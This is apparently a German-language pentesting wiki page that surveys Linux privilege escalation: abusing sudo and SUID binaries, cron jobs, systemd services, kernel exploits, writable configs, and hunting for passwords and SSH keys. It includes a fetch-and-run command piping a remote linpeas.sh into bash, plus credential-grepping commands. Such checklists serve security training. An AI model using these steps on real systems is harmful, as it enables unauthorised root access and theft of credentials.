Privilege escalation
Übersicht: Privilege Escalation unter Linux – Techniken und Anwendungsfälle
Ziel: Diese Seite bietet eine strukturierte Übersicht aller gängigen Privilege Escalation Methoden unter Linux, gegliedert nach Technik, typischem Befund und passendem Werkzeug. Sie dient als Navigationshilfe und Entscheidungshilfe, wann welche Methode sinnvoll ist.
🔑 1. Sudo-Rechte ausnutzen
Typischer Hinweis:
sudo -l
Wenn du Einträge wie (ALL) NOPASSWD: /usr/bin/<tool>
siehst.
Methode:
Führe
sudo
-fähige Tools als Root ausNutze GTFOBins zur Prüfung, ob das Tool missbrauchbar ist
Beispiele: find
, vi
, less
, perl
, awk
, tar
🧱 2. SUID-Binaries
Typischer Hinweis:
find / -perm -4000 -type f 2>/dev/null
Methode:
Suche nach root-eigenen Binaries mit SUID-Bit
Missbrauch durch:
PATH-Hijacking
Environment-Variable Manipulation
LD_PRELOAD (wenn möglich)
Tools: strings
, strace
, ltrace
, Ghidra
, GTFOBins
⏱ 3. Cron-Jobs
Typischer Hinweis:
cat /etc/crontab
crontab -l
Methode:
Wenn Root-Crons modifizierbare Skripte ausführen
Missbrauch von Wildcards und unsicheren Dateipfaden
Tools: find / -writable -type f
, pspy
🧩 4. Systemdienste (systemd)
Typischer Hinweis:
systemctl list-units
Methode:
Schreibrechte auf
.service
-Dateien oder deren BinariesDienste als Root gestartet → Binary-Austausch = Root-Shell
Tools: ls -l
, grep
, systemctl
, journalctl
🧠 5. Kernel Exploits
Typischer Hinweis:
uname -a
cat /etc/os-release
Methode:
Überprüfe Kernel-Version auf bekannte Exploits (z. B. DirtyCow)
Tools: exploit-db
, searchsploit
, Linux Exploit Suggester
, linPEAS
📦 6. Schreibbare Konfigurationen und Dateizugriff
Typischer Hinweis:
find /etc -writable -type f
Methode:
Konfigurationsdateien modifizieren, die bei Dienststart gelesen werden
z. B.
.bashrc
,.profile
,.ssh/authorized_keys
📜 7. Interessante Dateien & Benutzerfehler
Typischer Hinweis:
grep -i 'pass' /etc/* 2>/dev/null
ls -la /home/*/.ssh
Methode:
Hartkodierte Passwörter in Konfigurationsdateien
SSH-Keys kopieren
🔍 8. Automatisierte Enumeration
Tools:
linPEAS
,Linux Exploit Suggester
,LES
,pspy
Warum:
Umfassende Prüfung auf alle PE-Vektoren
Farbliche Hervorhebung kritischer Stellen
Beispiel:
curl http://<IP>:8080/linpeas.sh | bash
🚩 Tipp: Vorgehen bei Enumeration
sudo -l
prüfen → GTFOBinsfind / -perm -4000
→ SUIDpspy
ausführen → Crons/Trigger erkennensystemctl
&/etc
prüfen → Konfigs & DiensteKernel-Version & Exploit-Datenbank vergleichen
linPEAS → zur Absicherung gegen Lücken
Last updated